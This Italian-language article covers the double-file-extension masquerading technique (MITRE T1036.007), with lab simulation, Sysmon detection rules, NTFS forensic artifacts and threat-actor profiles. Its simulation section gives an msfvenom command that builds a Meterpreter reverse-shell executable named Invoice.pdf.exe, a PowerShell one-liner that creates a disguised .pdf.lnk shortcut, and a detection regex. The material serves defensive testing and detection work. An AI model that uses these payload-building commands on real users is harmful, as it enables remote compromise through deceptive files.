Doppia Estensione nei Nomi File: Double File Extension (T1036.007)

Simulare la doppia estensione in laboratorio è utile per validare i controlli GPO, testare le regole di detection Sysmon e misurare la risposta degli utenti durante campagne di phishing controllate. La catena d'attacco prevede tre fasi: creazione del payload mascherato, delivery e verifica dell'esecuzione.

Creazione del payload su Linux. Con msfvenom (open source, parte di Metasploit Framework) si genera un eseguibile Windows rinominato con doppia estensione:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4443 -f exe -o Invoice.pdf.exe

Il file risultante si chiama Invoice.pdf.exe. Su un sistema Windows con estensioni nascoste, l'utente vedrà soltanto Invoice.pdf. Per replicare il pattern .pdf.lnk documentato per Kimsuky e per il malware DarkGate, si può creare un collegamento LNK malevolo con PowerShell:

$ws = New-Object -ComObject WScript.Shell; $sc = $ws.CreateShortcut("$env:USERPROFILE\Desktop\Documento.pdf.lnk"); $sc.TargetPath = "cmd.exe"; $sc.Arguments = "/c calc.exe"; $sc.IconLocation = "shell32.dll,1"; $sc.Save()

Questo comando genera un file Documento.pdf.lnk che, con le estensioni nascoste, appare come Documento.pdf e al doppio clic lancia calc.exe (sostituibile con qualsiasi payload). L'uso dell'icona da shell32.dll rafforza l'inganno visivo.

Variante DOC.exe à la Bazar. Per simulare il pattern del loader Bazar, è sufficiente rinominare un eseguibile con doppia estensione DOC:

cp payload.exe PreviewReport.DOC.exe

Delivery via GoPhish. Per una campagna di phishing simulation realisticamente strutturata, GoPhish (open source) consente di allegare il file a template email e tracciare chi apre l'allegato. Il valore operativo sta nel misurare la percentuale di clic prima e dopo il training.

Validazione della detection. Dopo l'esecuzione, verificate che il SIEM abbia registrato sia la creazione del file (Sysmon EventCode 11 — FileCreate) sia l'avvio del processo (Sysmon EventCode 1 — ProcessCreate) dal path monitorato. Se entrambi gli eventi mancano, le regole di detection vanno riviste.

Un consiglio pratico: includete nel test anche estensioni meno ovvie come .jpg.scr e .doc.hta, perché alcune regole filtrano solo .exe come estensione finale e lasciano passare il resto.

La detection di file con doppia estensione è tra le più gratificanti in termini di rapporto segnale/rumore: il pattern è altamente specifico e i falsi positivi, con un tuning minimo, si riducono quasi a zero. La strategia di rilevamento documentata (DET0366) si basa sulla correlazione tra due eventi Sysmon nel log WinEventLog:Sysmon: la creazione di un file con naming sospetto e la successiva esecuzione di un processo originato da quel file.

La regola di base. Cercate in EventCode 11 (FileCreate) nomi file il cui pattern corrisponde a una prima estensione benigna (.txt, .jpg, .doc, .pdf) seguita da un'estensione eseguibile (.exe, .scr, .hta, .lnk). In pseudo-regex:

TargetFilename MATCHES '..(txt|jpg|doc|pdf|gif).(exe|scr|hta|lnk|pif|bat|cmd)$'*

Correlate poi con EventCode 1 (ProcessCreate) dove il campo Image contiene lo stesso percorso file, all'interno di una finestra temporale di 5-10 minuti. Questa correlazione conferma che il file non è stato solo scritto su disco, ma effettivamente eseguito.

Path prioritari da monitorare. Concentrate il monitoraggio sulle directory dove atterrano i file scaricati o estratti da allegati: la cartella Downloads dell'utente, %TEMP%, %APPDATA%, il Desktop e le directory temporanee usate dai client email come Outlook. Questo filtraggio per path riduce il volume di eventi da analizzare senza sacrificare la copertura.

Gestione dei falsi positivi. I casi legittimi di doppia estensione sono rari in ambienti aziendali. Possono verificarsi con software di backup che conserva il nome originale nel file compresso, o con strumenti di sviluppo che generano file di configurazione (il caso di companycatalog.exe.config usato da Milan mostra come anche i .config possano essere abusati). Create una whitelist per path e per processo padre: se il file proviene da un tool di build noto e la directory è quella di progetto, sopprimete l'alert.

Hardening complementare. La mitigazione M1028 suggerisce di disabilitare l'opzione "Nascondi estensioni per i tipi di file conosciuti" tramite GPO. Applicatela a tutta l'organizzazione con una policy di dominio: questo singolo intervento trasforma la doppia estensione da invisibile a immediatamente sospetta per l'utente. Combinate con il training utenti (M1017), che deve insegnare esplicitamente a riconoscere file con due estensioni come indicatore di compromissione.

L'analisi forense di un attacco con doppia estensione parte da un vantaggio: il file malevolo ha un nome altamente riconoscibile nel filesystem. Il lavoro investigativo si concentra sulla ricostruzione della catena delivery → scrittura su disco → esecuzione → post-exploitation.

Artefatti di delivery. Se il vettore è stato un allegato email, il primo punto di raccolta è il file PST/OST dell'utente o il log del mail server. Cercate l'allegato originale per estrarne l'hash. Sui client Outlook, il file transita attraverso la directory SecureTemp (un path sotto %LOCALAPPDATA%\Microsoft\Windows\INetCache\Content.Outlook\) prima di essere salvato dall'utente. Questa copia intermedia spesso sopravvive anche dopo che l'utente ha cancellato l'allegato.

Artefatti di creazione file. La Master File Table (MFT) di NTFS è la fonte primaria. Con MFTECmd di Eric Zimmerman (open source), parsate la $MFT cercando il pattern doppia estensione:

MFTECmd.exe -f C:\evidences$MFT --csv C:\output

Nel CSV risultante, filtrate la colonna FileName per pattern come .pdf.exe, .doc.lnk, .jpg.scr. Le colonne Created0x10 e Created0x30 — corrispondenti rispettivamente agli attributi $STANDARD_INFORMATION e $FILE_NAME — permettono di identificare timestomping: se le due date divergono significativamente, l'attaccante ha manipolato i timestamp.

Artefatti di esecuzione. Prefetch (se abilitato) registra l'avvio dell'eseguibile mascherato. Con PECmd (open source, Eric Zimmerman):

PECmd.exe -d C:\Windows\Prefetch --csv C:\output

Cercate nel campo ExecutableName i file con doppia estensione. Il Prefetch registra anche i file referenziati durante i primi 10 secondi di esecuzione, rivelando DLL caricate e file di configurazione toccati dal malware.

Per gli artefatti di ShimCache (AppCompatCache), AmCache e BAM/DAM, usate AppCompatCacheParser e AmcacheParser (entrambi open source, Eric Zimmerman). Questi registri attestano l'esistenza e l'esecuzione del file anche se è stato successivamente eliminato.

Ricostruzione della timeline. Convergete gli eventi in una singola timeline con Timeline Explorer (open source). I punti chiave sono quattro: ricezione dell'email (log server), salvataggio dell'allegato (MFT), esecuzione (Prefetch/Sysmon EventCode 1), e primo contatto C2 (log firewall/proxy). La finestra tra il salvataggio e l'esecuzione indica se l'utente ha aperto immediatamente il file — suggerendo social engineering efficace — o se è trascorso del tempo, indice di un'apertura accidentale successiva.

Su sistemi Linux, la stessa tecnica è meno efficace perché l'esecuzione dipende dai permessi e non dall'estensione, ma verificate comunque i log auditd per eventi execve su file con naming anomalo in /tmp o nelle home directory.

La doppia estensione è una tecnica trasversale, adottata sia da gruppi APT con mandato statale sia da operazioni cybercriminali orientate al profitto. I profili documentati rivelano pattern geografici e operativi distinti.

Kimsuky (G0094) è un gruppo legato alla Corea del Nord con focus su intelligence geopolitica, think tank e settore accademico sudcoreano, giapponese e occidentale. L'utilizzo di file .pdf.lnk indica una catena di infezione che sfrutta i collegamenti Windows come vettore esecutivo: il file LNK, mascherato da documento PDF, può invocare PowerShell o cmd.exe per scaricare payload secondari. Questo approccio mostra una preferenza per tecniche a basso costo che massimizzano l'interazione umana, coerente con il loro uso intensivo di spear-phishing mirato.

Mustang Panda (G0129) è un gruppo associato alla Cina, attivo principalmente contro enti governativi e ONG nel sudest asiatico e in Europa. L'adozione della doppia estensione si inserisce in una catena operativa che privilegia documenti-esca tematici — spesso legati a relazioni diplomatiche o comunicazioni ufficiali. Il fatto che il dato indichi un uso generico dell'estensione aggiuntiva, senza specificare la coppia esatta, suggerisce flessibilità tattica: l'estensione-esca viene scelta in base al contesto della vittima.

DarkGate (S1111) replica lo stesso pattern .pdf.lnk di Kimsuky, elemento che potrebbe indicare condivisione di TTP nel sottobosco cybercriminale o convergenza indipendente verso una tecnica efficace. Bazar (S0534), loader associato all'ecosistema Trickbot/Conti, utilizzava la variante .DOC.exe — una combinazione calibrata per ambienti aziendali dove i file Word sono il formato di scambio predominante. Milan (S1015) ha adottato un approccio più sofisticato con .exe.config, puntando sulla familiarità degli amministratori di sistema con i file di configurazione .NET.

Il trend emergente è la migrazione dal classico .txt.exe verso combinazioni che sfruttano LNK e HTA, più difficili da filtrare perché i gateway email spesso non ispezionano queste estensioni con la stessa aggressività riservata agli EXE. Per il monitoraggio proattivo, il TI team dovrebbe alimentare le regole YARA con pattern sui nomi file raccolti da sandbox pubbliche e correlare i campioni con doppia estensione nelle piattaforme di threat sharing per identificare cluster operativi ricorrenti.

Il dato geografico è netto: entrambi i gruppi APT documentati operano dall'area Asia-Pacifico con mandati statali, ma il malware commodity (DarkGate, Bazar) dimostra che la tecnica è universalmente adottata anche nel cybercrime finanziario europeo e nordamericano.

Framework MITRE ATT&CK v16 — T1036.007 (Double File Extension), TA0005 (Defense Evasion). Gruppi: G0094, G0129. Software: S1111, S0534, S1015. Mitigazioni: M1017, M1028. Detection: DET0366 / AN1033. Tool di detection: Sysmon, MFTECmd, PECmd, AppCompatCacheParser, AmcacheParser, Timeline Explorer. Integrato con conoscenza professionale per tool e procedure operative.